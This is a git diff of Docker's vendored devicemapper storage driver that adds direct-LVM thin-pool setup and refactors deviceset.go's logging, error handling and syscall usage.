+func readLVMConfig(root string) (directLVMConfig, error) {
+	var cfg directLVMConfig
+
+	p := filepath.Join(root, "setup-config.json")
+	b, err := ioutil.ReadFile(p)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return cfg, nil
+		}
+		return cfg, errors.Wrap(err, "error reading existing setup config")
+	}
+
+	// check if this is just an empty file, no need to produce a json error later if so
+	if len(b) == 0 {
+		return cfg, nil
+	}
+
+	err = json.Unmarshal(b, &cfg)
+	return cfg, errors.Wrap(err, "error unmarshaling previous device setup config")
+}
+
+func writeLVMConfig(root string, cfg directLVMConfig) error {
+	p := filepath.Join(root, "setup-config.json")
+	b, err := json.Marshal(cfg)
+	if err != nil {
+		return errors.Wrap(err, "error marshalling direct lvm config")
+	}
+	err = ioutil.WriteFile(p, b, 0600)
+	return errors.Wrap(err, "error writing direct lvm config to file")
+}
+
+func setupDirectLVM(cfg directLVMConfig) error {
+	lvmProfileDir := "/etc/lvm/profile"
+	binaries := []string{"pvcreate", "vgcreate", "lvcreate", "lvconvert", "lvchange", "thin_check"}
+
+	for _, bin := range binaries {
+		if _, err := exec.LookPath(bin); err != nil {
+			return errors.Wrap(err, "error looking up command `"+bin+"` while setting up direct lvm")
+		}
+	}
+
+	err := os.MkdirAll(lvmProfileDir, 0755)
+	if err != nil {
+		return errors.Wrap(err, "error creating lvm profile directory")
+	}
+
+	if cfg.AutoExtendPercent == 0 {
+		cfg.AutoExtendPercent = 20
+	}
+
+	if cfg.AutoExtendThreshold == 0 {
+		cfg.AutoExtendThreshold = 80
+	}
+
+	if cfg.ThinpPercent == 0 {
+		cfg.ThinpPercent = 95
+	}
+	if cfg.ThinpMetaPercent == 0 {
+		cfg.ThinpMetaPercent = 1
+	}
+
+	out, err := exec.Command("pvcreate", "-f", cfg.Device).CombinedOutput()
+	if err != nil {
+		return errors.Wrap(err, string(out))
+	}
+
+	out, err = exec.Command("vgcreate", "docker", cfg.Device).CombinedOutput()
+	if err != nil {
+		return errors.Wrap(err, string(out))
+	}
+
+	out, err = exec.Command("lvcreate", "--wipesignatures", "y", "-n", "thinpool", "docker", "--extents", fmt.Sprintf("%d%%VG", cfg.ThinpPercent)).CombinedOutput()
+	if err != nil {
+		return errors.Wrap(err, string(out))
+	}
+	out, err = exec.Command("lvcreate", "--wipesignatures", "y", "-n", "thinpoolmeta", "docker", "--extents", fmt.Sprintf("%d%%VG", cfg.ThinpMetaPercent)).CombinedOutput()
+	if err != nil {
+		return errors.Wrap(err, string(out))
+	}
+
+	out, err = exec.Command("lvconvert", "-y", "--zero", "n", "-c", "512K", "--thinpool", "docker/thinpool", "--poolmetadata", "docker/thinpoolmeta").CombinedOutput()
+	if err != nil {
+		return errors.Wrap(err, string(out))
+	}
+
+	profile := fmt.Sprintf("activation{\nthin_pool_autoextend_threshold=%d\nthin_pool_autoextend_percent=%d\n}", cfg.AutoExtendThreshold, cfg.AutoExtendPercent)
+	err = ioutil.WriteFile(lvmProfileDir+"/docker-thinpool.profile", []byte(profile), 0600)
+	if err != nil {
+		return errors.Wrap(err, "error writing docker thinp autoextend profile")
+	}
+
+	out, err = exec.Command("lvchange", "--metadataprofile", "docker-thinpool", "docker/thinpool").CombinedOutput()
+	return errors.Wrap(err, string(out))
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go
index b8e762592c..2bfbf05a27 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go
@@ -1,11 +1,10 @@
 // +build linux
 
-package devmapper
+package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper"
 
 import (
 	"bufio"
 	"encoding/json"
-	"errors"
 	"fmt"
 	"io"
 	"io/ioutil"
@@ -13,47 +12,46 @@ import (
 	"os/exec"
 	"path"
 	"path/filepath"
+	"reflect"
 	"strconv"
 	"strings"
 	"sync"
-	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/pkg/devicemapper"
+	"github.com/docker/docker/pkg/dmesg"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/loopback"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/docker/pkg/parsers/kernel"
 	"github.com/docker/go-units"
-
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 var (
-	defaultDataLoopbackSize     int64  = 100 * 1024 * 1024 * 1024
-	defaultMetaDataLoopbackSize int64  = 2 * 1024 * 1024 * 1024
-	defaultBaseFsSize           uint64 = 10 * 1024 * 1024 * 1024
-	defaultThinpBlockSize       uint32 = 128 // 64K = 128 512b sectors
-	defaultUdevSyncOverride            = false
-	maxDeviceID                        = 0xffffff // 24 bit, pool limit
-	deviceIDMapSz                      = (maxDeviceID + 1) / 8
-	// We retry device removal so many a times that even error messages
-	// will fill up console during normal operation. So only log Fatal
-	// messages by default.
-	logLevel                            = devicemapper.LogLevelFatal
+	defaultDataLoopbackSize      int64  = 100 * 1024 * 1024 * 1024
+	defaultMetaDataLoopbackSize  int64  = 2 * 1024 * 1024 * 1024
+	defaultBaseFsSize            uint64 = 10 * 1024 * 1024 * 1024
+	defaultThinpBlockSize        uint32 = 128 // 64K = 128 512b sectors
+	defaultUdevSyncOverride             = false
+	maxDeviceID                         = 0xffffff // 24 bit, pool limit
+	deviceIDMapSz                       = (maxDeviceID + 1) / 8
 	driverDeferredRemovalSupport        = false
 	enableDeferredRemoval               = false
 	enableDeferredDeletion              = false
 	userBaseSize                        = false
 	defaultMinFreeSpacePercent   uint32 = 10
+	lvmSetupConfigForce          bool
 )
 
-const deviceSetMetaFile string = "deviceset-metadata"
-const transactionMetaFile string = "transaction-metadata"
+const deviceSetMetaFile = "deviceset-metadata"
+const transactionMetaFile = "transaction-metadata"
 
 type transaction struct {
 	OpenTransactionID uint64 `json:"open_transaction_id"`
@@ -123,6 +121,7 @@ type DeviceSet struct {
 	gidMaps               []idtools.IDMap
 	minFreeSpacePercent   uint32 //min free space percentage in thinpool
 	xfsNospaceRetries     string // max retries when xfs receives ENOSPC
+	lvmSetupConfig        directLVMConfig
 }
 
 // DiskUsage contains information about disk usage and is used when reporting Status of a device.
@@ -269,7 +268,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) {
 	if err != nil {
 		return "", err
 	}
-	if err := idtools.MkdirAllAs(dirname, 0700, uid, gid); err != nil && !os.IsExist(err) {
+	if err := idtools.MkdirAllAndChown(dirname, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil {
 		return "", err
 	}
 
@@ -277,7 +276,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) {
 		if !os.IsNotExist(err) {
 			return "", err
 		}
-		logrus.Debugf("devmapper: Creating loopback file %s for device-manage use", filename)
+		logrus.WithField("storage-driver", "devicemapper").Debugf("Creating loopback file %s for device-manage use", filename)
 		file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600)
 		if err != nil {
 			return "", err
@@ -298,7 +297,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) {
 				return "", fmt.Errorf("devmapper: Unable to grow loopback file %s: %v", filename, err)
 			}
 		} else if fi.Size() > size {
-			logrus.Warnf("devmapper: Can't shrink loopback file %s", filename)
+			logrus.WithField("storage-driver", "devicemapper").Warnf("Can't shrink loopback file %s", filename)
 		}
 	}
 	return filename, nil
@@ -356,10 +355,7 @@ func (devices *DeviceSet) saveMetadata(info *devInfo) error {
 	if err != nil {
 		return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err)
 	}
-	if err := devices.writeMetaFile(jsonData, devices.metadataFile(info)); err != nil {
-		return err
-	}
-	return nil
+	return devices.writeMetaFile(jsonData, devices.metadataFile(info))
 }
 
 func (devices *DeviceSet) markDeviceIDUsed(deviceID int) {
@@ -380,10 +376,7 @@ func (devices *DeviceSet) isDeviceIDFree(deviceID int) bool {
 	var mask byte
 	i := deviceID % 8
 	mask = (1 << uint(i))
-	if (devices.deviceIDMap[deviceID/8] & mask) != 0 {
-		return false
-	}
-	return true
+	return (devices.deviceIDMap[deviceID/8] & mask) == 0
 }
 
 // Should be called with devices.Lock() held.
@@ -410,39 +403,40 @@ func (devices *DeviceSet) lookupDeviceWithLock(hash string) (*devInfo, error) {
 // This function relies on that device hash map has been loaded in advance.
 // Should be called with devices.Lock() held.
 func (devices *DeviceSet) constructDeviceIDMap() {
-	logrus.Debug("devmapper: constructDeviceIDMap()")
-	defer logrus.Debug("devmapper: constructDeviceIDMap() END")
+	logrus.WithField("storage-driver", "devicemapper").Debug("constructDeviceIDMap()")
+	defer logrus.WithField("storage-driver", "devicemapper").Debug("constructDeviceIDMap() END")
 
 	for _, info := range devices.Devices {
 		devices.markDeviceIDUsed(info.DeviceID)
-		logrus.Debugf("devmapper: Added deviceId=%d to DeviceIdMap", info.DeviceID)
+		logrus.WithField("storage-driver", "devicemapper").Debugf("Added deviceId=%d to DeviceIdMap", info.DeviceID)
 	}
 }
 
 func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) error {
+	logger := logrus.WithField("storage-driver", "devicemapper")
 
 	// Skip some of the meta files which are not device files.
 	if strings.HasSuffix(finfo.Name(), ".migrated") {
-		logrus.Debugf("devmapper: Skipping file %s", path)
+		logger.Debugf("Skipping file %s", path)
 		return nil
 	}
 
 	if strings.HasPrefix(finfo.Name(), ".") {
-		logrus.Debugf("devmapper: Skipping file %s", path)
+		logger.Debugf("Skipping file %s", path)
 		return nil
 	}
 
 	if finfo.Name() == deviceSetMetaFile {
-		logrus.Debugf("devmapper: Skipping file %s", path)
+		logger.Debugf("Skipping file %s", path)
 		return nil
 	}
 
 	if finfo.Name() == transactionMetaFile {
-		logrus.Debugf("devmapper: Skipping file %s", path)
+		logger.Debugf("Skipping file %s", path)
 		return nil
 	}
 
-	logrus.Debugf("devmapper: Loading data for file %s", path)
+	logger.Debugf("Loading data for file %s", path)
 
 	hash := finfo.Name()
 	if hash == "base" {
@@ -459,12 +453,12 @@ func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo)
 }
 
 func (devices *DeviceSet) loadDeviceFilesOnStart() error {
-	logrus.Debug("devmapper: loadDeviceFilesOnStart()")
-	defer logrus.Debug("devmapper: loadDeviceFilesOnStart() END")
+	logrus.WithField("storage-driver", "devicemapper").Debug("loadDeviceFilesOnStart()")
+	defer logrus.WithField("storage-driver", "devicemapper").Debug("loadDeviceFilesOnStart() END")
 
 	var scan = func(path string, info os.FileInfo, err error) error {
 		if err != nil {
-			logrus.Debugf("devmapper: Can't walk the file %s", path)
+			logrus.WithField("storage-driver", "devicemapper").Debugf("Can't walk the file %s", path)
 			return nil
 		}
 
@@ -480,17 +474,16 @@ func (devices *DeviceSet) loadDeviceFilesOnStart() error {
 }
 
 // Should be called with devices.Lock() held.
-func (devices *DeviceSet) unregisterDevice(id int, hash string) error {
-	logrus.Debugf("devmapper: unregisterDevice(%v, %v)", id, hash)
+func (devices *DeviceSet) unregisterDevice(hash string) error {
+	logrus.WithField("storage-driver", "devicemapper").Debugf("unregisterDevice(%v)", hash)
 	info := &devInfo{
-		Hash:     hash,
-		DeviceID: id,
+		Hash: hash,
 	}
 
 	delete(devices.Devices, hash)
 
 	if err := devices.removeMetadata(info); err != nil {
-		logrus.Debugf("devmapper: Error removing metadata: %s", err)
+		logrus.WithField("storage-driver", "devicemapper").Debugf("Error removing metadata: %s", err)
 		return err
 	}
 
@@ -499,7 +492,7 @@ func (devices *DeviceSet) unregisterDevice(id int, hash string) error {
 
 // Should be called with devices.Lock() held.
 func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, transactionID uint64) (*devInfo, error) {
-	logrus.Debugf("devmapper: registerDevice(%v, %v)", id, hash)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("registerDevice(%v, %v)", id, hash)
 	info := &devInfo{
 		Hash:          hash,
 		DeviceID:      id,
@@ -521,7 +514,7 @@ func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, trans
 }
 
 func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bool) error {
-	logrus.Debugf("devmapper: activateDeviceIfNeeded(%v)", info.Hash)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("activateDeviceIfNeeded(%v)", info.Hash)
 
 	if info.Deleted && !ignoreDeleted {
 		return fmt.Errorf("devmapper: Can't activate device %v as it is marked for deletion", info.Hash)
@@ -540,11 +533,11 @@ func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bo
 	return devicemapper.ActivateDevice(devices.getPoolDevName(), info.Name(), info.DeviceID, info.Size)
 }
 
-// Return true only if kernel supports xfs and mkfs.xfs is available
-func xfsSupported() bool {
+// xfsSupported checks if xfs is supported, returns nil if it is, otherwise an error
+func xfsSupported() error {
 	// Make sure mkfs.xfs is available
 	if _, err := exec.LookPath("mkfs.xfs"); err != nil {
-		return false
+		return err // error text is descriptive enough
 	}
 
 	// Check if kernel supports xfs filesystem or not.
@@ -552,40 +545,47 @@ func xfsSupported() bool {
 
 	f, err := os.Open("/proc/filesystems")
 	if err != nil {
-		logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err)
-		return false
+		return errors.Wrapf(err, "error checking for xfs support")
 	}
 	defer f.Close()
 
 	s := bufio.NewScanner(f)
 	for s.Scan() {
 		if strings.HasSuffix(s.Text(), "\txfs") {
-			return true
+			return nil
 		}
 	}
 
 	if err := s.Err(); err != nil {
-		logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err)
+		return errors.Wrapf(err, "error checking for xfs support")
 	}
-	return false
+
+	return errors.New(`kernel does not support xfs, or "modprobe xfs" failed`)
 }
 
 func determineDefaultFS() string {
-	if xfsSupported() {
+	err := xfsSupported()
+	if err == nil {
 		return "xfs"
 	}
 
-	logrus.Warn("devmapper: XFS is not supported in your system. Either the kernel doesn't support it or mkfs.xfs is not in your PATH. Defaulting to ext4 filesystem")
+	logrus.WithField("storage-driver", "devicemapper").Warnf("XFS is not supported in your system (%v). Defaulting to ext4 filesystem", err)
 	return "ext4"
 }
 
-func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) {
-	devname := info.DevName()
+// mkfsOptions tries to figure out whether some additional mkfs options are required
+func mkfsOptions(fs string) []string {
+	if fs == "xfs" && !kernel.CheckKernelVersion(3, 16, 0) {
+		// For kernels earlier than 3.16 (and newer xfsutils),
+		// some xfs features need to be explicitly disabled.
+		return []string{"-m", "crc=0,finobt=0"}
+	}
 
-	args := []string{}
-	args = append(args, devices.mkfsArgs...)
+	return []string{}
+}
 
-	args = append(args, devname)
+func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) {
+	devname := info.DevName()
 
 	if devices.filesystem == "" {
 		devices.filesystem = determineDefaultFS()
@@ -594,12 +594,16 @@ func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) {
 		return err
 	}
 
-	logrus.Infof("devmapper: Creating filesystem %s on device %s", devices.filesystem, info.Name())
+	args := mkfsOptions(devices.filesystem)
+	args = append(args, devices.mkfsArgs...)
+	args = append(args, devname)
+
+	logrus.WithField("storage-driver", "devicemapper").Infof("Creating filesystem %s on device %s, mkfs args: %v", devices.filesystem, info.Name(), args)
 	defer func() {
 		if err != nil {
-			logrus.Infof("devmapper: Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err)
+			logrus.WithField("storage-driver", "devicemapper").Infof("Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err)
 		} else {
-			logrus.Infof("devmapper: Successfully created filesystem %s on device %s", devices.filesystem, info.Name())
+			logrus.WithField("storage-driver", "devicemapper").Infof("Successfully created filesystem %s on device %s", devices.filesystem, info.Name())
 		}
 	}()
 
@@ -665,7 +669,7 @@ func (devices *DeviceSet) cleanupDeletedDevices() error {
 		if !info.Deleted {
 			continue
 		}
-		logrus.Debugf("devmapper: Found deleted device %s.", info.Hash)
+		logrus.WithField("storage-driver", "devicemapper").Debugf("Found deleted device %s.", info.Hash)
 		deletedDevices = append(deletedDevices, info)
 	}
 
@@ -676,7 +680,7 @@ func (devices *DeviceSet) cleanupDeletedDevices() error {
 	for _, info := range deletedDevices {
 		// This will again try deferred deletion.
 		if err := devices.DeleteDevice(info.Hash, false); err != nil {
-			logrus.Warnf("devmapper: Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err)
+			logrus.WithField("storage-driver", "devicemapper").Warnf("Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err)
 		}
 	}
 
@@ -698,7 +702,7 @@ func (devices *DeviceSet) startDeviceDeletionWorker() {
 		return
 	}
 
-	logrus.Debug("devmapper: Worker to cleanup deleted devices started")
+	logrus.WithField("storage-driver", "devicemapper").Debug("Worker to cleanup deleted devices started")
 	for range devices.deletionWorkerTicker.C {
 		devices.cleanupDeletedDevices()
 	}
@@ -794,8 +798,10 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) {
 		return nil, err
 	}
 
+	logger := logrus.WithField("storage-driver", "devicemapper")
+
 	if err := devices.openTransaction(hash, deviceID); err != nil {
-		logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID)
+		logger.Debugf("Error opening transaction hash = %s deviceID = %d", hash, deviceID)
 		devices.markDeviceIDFree(deviceID)
 		return nil, err
 	}
@@ -807,7 +813,7 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) {
 				// happen. Now we have a mechanism to find
 				// a free device ID. So something is not right.
 				// Give a warning and continue.
-				logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID)
+				logger.Errorf("Device ID %d exists in pool but it is supposed to be unused", deviceID)
 				deviceID, err = devices.getNextFreeDeviceID()
 				if err != nil {
 					return nil, err
@@ -816,14 +822,14 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) {
 				devices.refreshTransaction(deviceID)
 				continue
 			}
-			logrus.Debugf("devmapper: Error creating device: %s", err)
+			logger.Debugf("Error creating device: %s", err)
 			devices.markDeviceIDFree(deviceID)
 			return nil, err
 		}
 		break
 	}
 
-	logrus.Debugf("devmapper: Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize)
+	logger.Debugf("Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize)
 	info, err := devices.registerDevice(deviceID, hash, devices.baseFsSize, devices.OpenTransactionID)
 	if err != nil {
 		_ = devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
@@ -832,7 +838,7 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) {
 	}
 
 	if err := devices.closeTransaction(); err != nil {
-		devices.unregisterDevice(deviceID, hash)
+		devices.unregisterDevice(hash)
 		devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
 		devices.markDeviceIDFree(deviceID)
 		return nil, err
@@ -862,6 +868,7 @@ func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint
 				if err != devicemapper.ErrEnxio {
 					return err
 				}
+				devinfo = nil
 			} else {
 				defer devices.deactivateDevice(baseInfo)
 			}
@@ -882,11 +889,7 @@ func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint
 		defer devicemapper.ResumeDevice(baseInfo.Name())
 	}
 
-	if err = devices.createRegisterSnapDevice(hash, baseInfo, size); err != nil {
-		return err
-	}
-
-	return nil
+	return devices.createRegisterSnapDevice(hash, baseInfo, size)
 }
 
 func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInfo, size uint64) error {
@@ -895,8 +898,10 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf
 		return err
 	}
 
+	logger := logrus.WithField("storage-driver", "devicemapper")
+
 	if err := devices.openTransaction(hash, deviceID); err != nil {
-		logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID)
+		logger.Debugf("Error opening transaction hash = %s deviceID = %d", hash, deviceID)
 		devices.markDeviceIDFree(deviceID)
 		return err
 	}
@@ -908,7 +913,7 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf
 				// happen. Now we have a mechanism to find
 				// a free device ID. So something is not right.
 				// Give a warning and continue.
-				logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID)
+				logger.Errorf("Device ID %d exists in pool but it is supposed to be unused", deviceID)
 				deviceID, err = devices.getNextFreeDeviceID()
 				if err != nil {
 					return err
@@ -917,7 +922,7 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf
 				devices.refreshTransaction(deviceID)
 				continue
 			}
-			logrus.Debugf("devmapper: Error creating snap device: %s", err)
+			logger.Debugf("Error creating snap device: %s", err)
 			devices.markDeviceIDFree(deviceID)
 			return err
 		}
@@ -927,12 +932,12 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf
 	if _, err := devices.registerDevice(deviceID, hash, size, devices.OpenTransactionID); err != nil {
 		devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
 		devices.markDeviceIDFree(deviceID)
-		logrus.Debugf("devmapper: Error registering device: %s", err)
+		logger.Debugf("Error registering device: %s", err)
 		return err
 	}
 
 	if err := devices.closeTransaction(); err != nil {
-		devices.unregisterDevice(deviceID, hash)
+		devices.unregisterDevice(hash)
 		devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID)
 		devices.markDeviceIDFree(deviceID)
 		return err
@@ -942,20 +947,21 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf
 
 func (devices *DeviceSet) loadMetadata(hash string) *devInfo {
 	info := &devInfo{Hash: hash, devices: devices}
+	logger := logrus.WithField("storage-driver", "devicemapper")
 
 	jsonData, err := ioutil.ReadFile(devices.metadataFile(info))
 	if err != nil {
-		logrus.Debugf("devmapper: Failed to read %s with err: %v", devices.metadataFile(info), err)
+		logger.Debugf("Failed to read %s with err: %v", devices.metadataFile(info), err)
 		return nil
 	}
 
 	if err := json.Unmarshal(jsonData, &info); err != nil {
-		logrus.Debugf("devmapper: Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err)
+		logger.Debugf("Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err)
 		return nil
 	}
 
 	if info.DeviceID > maxDeviceID {
-		logrus.Errorf("devmapper: Ignoring Invalid DeviceId=%d", info.DeviceID)
+		logger.Errorf("Ignoring Invalid DeviceId=%d", info.DeviceID)
 		return nil
 	}
 
@@ -970,7 +976,7 @@ func getDeviceUUID(device string) (string, error) {
 
 	uuid := strings.TrimSuffix(string(out), "\n")
 	uuid = strings.TrimSpace(uuid)
-	logrus.Debugf("devmapper: UUID for device: %s is:%s", device, uuid)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("UUID for device: %s is:%s", device, uuid)
 	return uuid, nil
 }
 
@@ -1018,7 +1024,7 @@ func (devices *DeviceSet) verifyBaseDeviceUUIDFS(baseInfo *devInfo) error {
 	// file system of base image is not same, warn user that dm.fs
 	// will be ignored.
 	if devices.BaseDeviceFilesystem != devices.filesystem {
-		logrus.Warnf("devmapper: Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem)
+		logrus.WithField("storage-driver", "devicemapper").Warnf("Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem)
 		devices.filesystem = devices.BaseDeviceFilesystem
 	}
 	return nil
@@ -1048,7 +1054,7 @@ func (devices *DeviceSet) saveBaseDeviceUUID(baseInfo *devInfo) error {
 }
 
 func (devices *DeviceSet) createBaseImage() error {
-	logrus.Debug("devmapper: Initializing base device-mapper thin volume")
+	logrus.WithField("storage-driver", "devicemapper").Debug("Initializing base device-mapper thin volume")
 
 	// Create initial device
 	info, err := devices.createRegisterDevice("")
@@ -1056,7 +1062,7 @@ func (devices *DeviceSet) createBaseImage() error {
 		return err
 	}
 
-	logrus.Debug("devmapper: Creating filesystem on base device-mapper thin volume")
+	logrus.WithField("storage-driver", "devicemapper").Debug("Creating filesystem on base device-mapper thin volume")
 
 	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
 		return err
@@ -1082,7 +1088,7 @@ func (devices *DeviceSet) createBaseImage() error {
 // Returns if thin pool device exists or not. If device exists, also makes
 // sure it is a thin pool device and not some other type of device.
 func (devices *DeviceSet) thinPoolExists(thinPoolDevice string) (bool, error) {
-	logrus.Debugf("devmapper: Checking for existence of the pool %s", thinPoolDevice)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("Checking for existence of the pool %s", thinPoolDevice)
 
 	info, err := devicemapper.GetInfo(thinPoolDevice)
 	if err != nil {
@@ -1194,10 +1200,10 @@ func (devices *DeviceSet) growFS(info *devInfo) error {
 	options = joinMountOptions(options, devices.mountOptions)
 
 	if err := mount.Mount(info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options); err != nil {
-		return fmt.Errorf("Error mounting '%s' on '%s': %s", info.DevName(), fsMountPoint, err)
+		return fmt.Errorf("Error mounting '%s' on '%s' (fstype='%s' options='%s'): %s\n%v", info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options, err, string(dmesg.Dmesg(256)))
 	}
 
-	defer syscall.Unmount(fsMountPoint, syscall.MNT_DETACH)
+	defer unix.Unmount(fsMountPoint, unix.MNT_DETACH)
 
 	switch devices.BaseDeviceFilesystem {
 	case "ext4":
@@ -1226,15 +1232,10 @@ func (devices *DeviceSet) setupBaseImage() error {
 			if err := devices.setupVerifyBaseImageUUIDFS(oldInfo); err != nil {
 				return err
 			}
-
-			if err := devices.checkGrowBaseDeviceFS(oldInfo); err != nil {
-				return err
-			}
-
-			return nil
+			return devices.checkGrowBaseDeviceFS(oldInfo)
 		}
 
-		logrus.Debug("devmapper: Removing uninitialized base image")
+		logrus.WithField("storage-driver", "devicemapper").Debug("Removing uninitialized base image")
 		// If previous base device is in deferred delete state,
 		// that needs to be cleaned up first. So don't try
 		// deferred deletion.
@@ -1252,47 +1253,22 @@ func (devices *DeviceSet) setupBaseImage() error {
 	}
 
 	// Create new base image device
-	if err := devices.createBaseImage(); err != nil {
-		return err
-	}
-
-	return nil
+	return devices.createBaseImage()
 }
 
 func setCloseOnExec(name string) {
-	if fileInfos, _ := ioutil.ReadDir("/proc/self/fd"); fileInfos != nil {
-		for _, i := range fileInfos {
-			link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name()))
-			if link == name {
-				fd, err := strconv.Atoi(i.Name())
-				if err == nil {
-					syscall.CloseOnExec(fd)
-				}
+	fileInfos, _ := ioutil.ReadDir("/proc/self/fd")
+	for _, i := range fileInfos {
+		link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name()))
+		if link == name {
+			fd, err := strconv.Atoi(i.Name())
+			if err == nil {
+				unix.CloseOnExec(fd)
 			}
 		}
 	}
 }
 
-// DMLog implements logging using DevMapperLogger interface.
-func (devices *DeviceSet) DMLog(level int, file string, line int, dmError int, message string) {
-	// By default libdm sends us all the messages including debug ones.
-	// We need to filter out messages here and figure out which one
-	// should be printed.
-	if level > logLevel {
-		return
-	}
-
-	// FIXME(vbatts) push this back into ./pkg/devicemapper/
-	if level <= devicemapper.LogLevelErr {
-		logrus.Errorf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
-	} else if level <= devicemapper.LogLevelInfo {
-		logrus.Infof("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
-	} else {
-		// FIXME(vbatts) push this back into ./pkg/devicemapper/
-		logrus.Debugf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
-	}
-}
-
 func major(device uint64) uint64 {
 	return (device >> 8) & 0xfff
 }
@@ -1400,31 +1376,30 @@ func (devices *DeviceSet) saveTransactionMetaData() error {
 }
 
 func (devices *DeviceSet) removeTransactionMetaData() error {
-	if err := os.RemoveAll(devices.transactionMetaFile()); err != nil {
-		return err
-	}
-	return nil
+	return os.RemoveAll(devices.transactionMetaFile())
 }
 
 func (devices *DeviceSet) rollbackTransaction() error {
-	logrus.Debugf("devmapper: Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID)
+	logger := logrus.WithField("storage-driver", "devicemapper")
+
+	logger.Debugf("Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID)
 
 	// A device id might have already been deleted before transaction
 	// closed. In that case this call will fail. Just leave a message
 	// in case of failure.
 	if err := devicemapper.DeleteDevice(devices.getPoolDevName(), devices.DeviceID); err != nil {
-		logrus.Errorf("devmapper: Unable to delete device: %s", err)
+		logger.Errorf("Unable to delete device: %s", err)
 	}
 
 	dinfo := &devInfo{Hash: devices.DeviceIDHash}
 	if err := devices.removeMetadata(dinfo); err != nil {
-		logrus.Errorf("devmapper: Unable to remove metadata: %s", err)
+		logger.Errorf("Unable to remove metadata: %s", err)
 	} else {
 		devices.markDeviceIDFree(devices.DeviceID)
 	}
 
 	if err := devices.removeTransactionMetaData(); err != nil {
-		logrus.Errorf("devmapper: Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err)
+		logger.Errorf("Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err)
 	}
 
 	return nil
